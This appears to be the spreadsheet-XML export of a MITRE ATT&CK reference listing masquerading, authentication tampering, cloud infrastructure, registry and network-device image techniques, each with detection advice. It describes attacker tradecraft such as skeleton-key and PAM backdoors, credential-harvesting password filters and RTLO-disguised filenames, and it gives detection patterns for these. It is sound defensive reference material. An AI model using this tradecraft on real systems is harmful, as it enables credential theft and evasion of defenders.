    <t>Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/001</t>
  </si>
  <si>
    <t>10 February 2020</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>File: File Metadata</t>
  </si>
  <si>
    <t>T1036.004</t>
  </si>
  <si>
    <t>Masquerading: Masquerade Task or Service</t>
  </si>
  <si>
    <t>Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.
Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/004</t>
  </si>
  <si>
    <t>Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services.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</si>
  <si>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Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1036.005</t>
  </si>
  <si>
    <t>Masquerading: Match Legitimate Name or Location</t>
  </si>
  <si>
    <t>Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/005</t>
  </si>
  <si>
    <t>Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
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
In containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users.</t>
  </si>
  <si>
    <t>File: File Metadata, Image: Image Metadata, Process: Process Metadata</t>
  </si>
  <si>
    <t>Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1036.003</t>
  </si>
  <si>
    <t>Masquerading: Rename System Utilities</t>
  </si>
  <si>
    <t>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename &lt;code&gt;rundll32.exe&lt;/code&gt;). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/003</t>
  </si>
  <si>
    <t>If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1036.002</t>
  </si>
  <si>
    <t>Masquerading: Right-to-Left Override</t>
  </si>
  <si>
    <t>Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver executable named &lt;code&gt;March 25 \u202Excod.scr&lt;/code&gt; will display as &lt;code&gt;March 25 rcs.docx&lt;/code&gt;. A JavaScript file named &lt;code&gt;photo_high_re\u202Egnp.js&lt;/code&gt; will be displayed as &lt;code&gt;photo_high_resj.png&lt;/code&gt;.
A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/002</t>
  </si>
  <si>
    <t>Detection methods should include looking for common formats of RTLO characters within filenames such as &lt;code&gt;\u202E&lt;/code&gt;, &lt;code&gt;[U+202E]&lt;/code&gt;, and &lt;code&gt;%E2%80%AE&lt;/code&gt;. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.</t>
  </si>
  <si>
    <t>T1036.006</t>
  </si>
  <si>
    <t>Masquerading: Space after Filename</t>
  </si>
  <si>
    <t>Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.
For example, if there is a Mach-O executable file called &lt;code&gt;evil.bin&lt;/code&gt;, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to &lt;code&gt;evil.txt&lt;/code&gt;, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to &lt;code&gt;evil.txt &lt;/code&gt; (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).
Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1036/006</t>
  </si>
  <si>
    <t>It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.</t>
  </si>
  <si>
    <t>Erye Hernandez, Palo Alto Networks</t>
  </si>
  <si>
    <t>T1556</t>
  </si>
  <si>
    <t>Modify Authentication Process</t>
  </si>
  <si>
    <t>Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556</t>
  </si>
  <si>
    <t>Credential Access, Defense Evasion, Persistence</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</si>
  <si>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
Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) 
Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Monitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)
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</si>
  <si>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Creation, File: File Modification, Logon Session: Logon Session Creation, Module: Module Load, Process: OS API Execution, Process: Process Access, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Chris Ross @xorrior</t>
  </si>
  <si>
    <t>T1556.001</t>
  </si>
  <si>
    <t>Modify Authentication Process: Domain Controller Authentication</t>
  </si>
  <si>
    <t>Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. 
Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/001</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)
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t>
  </si>
  <si>
    <t>File: File Modification, Logon Session: Logon Session Creation, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1556.004</t>
  </si>
  <si>
    <t>Modify Authentication Process: Network Device Authentication</t>
  </si>
  <si>
    <t>Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password.  The modification includes a specific password which is implanted in the operating system image via the patch.  Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/004</t>
  </si>
  <si>
    <t>Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).</t>
  </si>
  <si>
    <t>T1556.002</t>
  </si>
  <si>
    <t>Modify Authentication Process: Password Filter DLL</t>
  </si>
  <si>
    <t>Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. 
Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. 
Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/002</t>
  </si>
  <si>
    <t>Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages&lt;/code&gt;) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)</t>
  </si>
  <si>
    <t>File: File Creation, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1556.003</t>
  </si>
  <si>
    <t>Modify Authentication Process: Pluggable Authentication Modules</t>
  </si>
  <si>
    <t>Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is &lt;code&gt;pam_unix.so&lt;/code&gt;, which retrieves, sets, and verifies account authentication information in &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
Adversaries may modify components of the PAM system to create backdoors. PAM components, such as &lt;code&gt;pam_unix.so&lt;/code&gt;, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/003</t>
  </si>
  <si>
    <t>Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present)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</si>
  <si>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File: File Modification, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>George Allen, VMware Carbon Black; Scott Knight, @sdotknight, VMware Carbon Black</t>
  </si>
  <si>
    <t>T1578</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure</t>
  </si>
  <si>
    <t>An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Instance: Instance Creation, Instance: Instance Deletion, Instance: Instance Modification, Instance: Instance Start, Instance: Instance Stop, Snapshot: Snapshot Creation, Snapshot: Snapshot Deletion, Snapshot: Snapshot Modification, Volume: Volume Creation, Volume: Volume Deletion, Volume: Volume Modification</t>
  </si>
  <si>
    <t>T1578.002</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Create Cloud Instance</t>
  </si>
  <si>
    <t>An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/002</t>
  </si>
  <si>
    <t>The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the &lt;code&gt;RunInstances&lt;/code&gt; event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of &lt;code&gt;gcloud compute instances create&lt;/code&gt; to create a VM.(Citation: Cloud Audit Logs)</t>
  </si>
  <si>
    <t>Instance: Instance Creation</t>
  </si>
  <si>
    <t>T1578.001</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Create Snapshot</t>
  </si>
  <si>
    <t>An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/001</t>
  </si>
  <si>
    <t>The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
In AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the &lt;code&gt;gcloud compute instances create&lt;/code&gt; command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the &lt;code&gt;"sourceSnapshot":&lt;/code&gt; parameter pointed to &lt;code&gt;"global/snapshots/[BOOT_SNAPSHOT_NAME]&lt;/code&gt;.(Citation: GCP - Creating and Starting a VM)</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Creation</t>
  </si>
  <si>
    <t>T1578.003</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Delete Cloud Instance</t>
  </si>
  <si>
    <t>An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/003</t>
  </si>
  <si>
    <t>The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the &lt;code&gt;TerminateInstances&lt;/code&gt; event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of &lt;code&gt;gcloud compute instances delete&lt;/code&gt; to delete a VM.(Citation: Cloud Audit Logs)</t>
  </si>
  <si>
    <t>Instance: Instance Deletion</t>
  </si>
  <si>
    <t>T1578.004</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Revert Cloud Instance</t>
  </si>
  <si>
    <t>An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/004</t>
  </si>
  <si>
    <t>Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Instance: Instance Modification, Instance: Instance Start, Instance: Instance Stop</t>
  </si>
  <si>
    <t>Netskope</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.
Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1112</t>
  </si>
  <si>
    <t>Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.
Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Bartosz Jerzman; David Lu, Tripwire; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1601</t>
  </si>
  <si>
    <t>Modify System Image</t>
  </si>
  <si>
    <t>Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it.  This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1601</t>
  </si>
  <si>
    <t>Most embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because this method may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. 
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  (Citation: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</si>
  <si>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T1601.002</t>
  </si>
  <si>
    <t>Modify System Image: Downgrade System Image</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may install an older version of the operating system of a network device to weaken security.  Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)
On embedded devices, downgrading the version typically only requires replacing the operating system file in storage.  With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart.  The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.
Downgrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).  Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1601/002</t>
  </si>
  <si>
    <t xml:space="preserve">Many embedded network devices provide a command to print the version of the currently running operating system.  Use this command to query the operating system for its version number and compare it to what is expected for the device in question.  Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. </t>
  </si>
  <si>
    <t>T1601.001</t>
  </si>
  <si>
    <t>Modify System Image: Patch System Image</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.  Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.
To change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection.  The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.
To change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system.  This method typically requires administrative level access to the device.
In the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system.  Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory.  This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.
By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).  Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).
Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders.   When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system.  By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. 
When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). 
When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots.  However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1601/001</t>
  </si>
  <si>
    <t>Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source.  Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not.  Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory.  If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.
